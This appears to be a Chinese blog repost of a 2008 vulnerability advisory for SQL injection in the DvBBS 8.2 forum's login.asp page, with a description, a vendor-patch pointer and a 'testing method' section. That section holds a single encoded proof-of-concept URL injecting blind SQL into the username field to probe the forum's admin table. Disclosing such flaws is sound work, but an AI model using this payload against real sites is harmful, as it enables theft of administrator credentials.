动网论坛DvBBS login.asp脚本多个SQL注入漏洞

[ Wednesday, June 04, 2008 ]

受影响系统：
动网论坛 Dvbbs 8.2
描述：
--------------------------------------------------------------------------------
BUGTRAQ ID: 29429

DVBBS是一款Aspsky.Net开发和维护的开放源码ASP Web论坛程序。

DvBBS的login.asp页面没有正确地验证用户所提交的登录请求，远程攻击者可以通过提交恶意的登录请求执行SQL注入攻击，判断有效的用户名和密码HASH。

<*来源：hackerb （hackerb@hotmail.com）

链接：http://marc.info/?l=bugtraq&m=121207760013300&w=2
*>

测试方法：
--------------------------------------------------------------------------------

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http:///www.example.com/?password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25

建议：
--------------------------------------------------------------------------------
厂商补丁：

动网论坛
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.dvbbs.net/

点击这里获取该日志的TrackBack引用地址

发布:babycrazy | 分类:IT新闻 | 评论:0 | 引用:0 | 浏览:

<< 2010-8 >>
Su	Mo	Tu	We	Th	Fr	Sa
1	2	3	4	5	6	7
8	9	10	11	12	13	14
15	16	17	18	19	20	21
22	23	24	25	26	27	28
29	30	31

动网论坛DvBBS login.asp脚本多个SQL注入漏洞

I like 网站优化_网络推广_网络营销_Seo-BabyCrazy Is On The Move

动网论坛DvBBS login.asp脚本多个SQL注入漏洞

Calendar

最新评论及回复

最近发表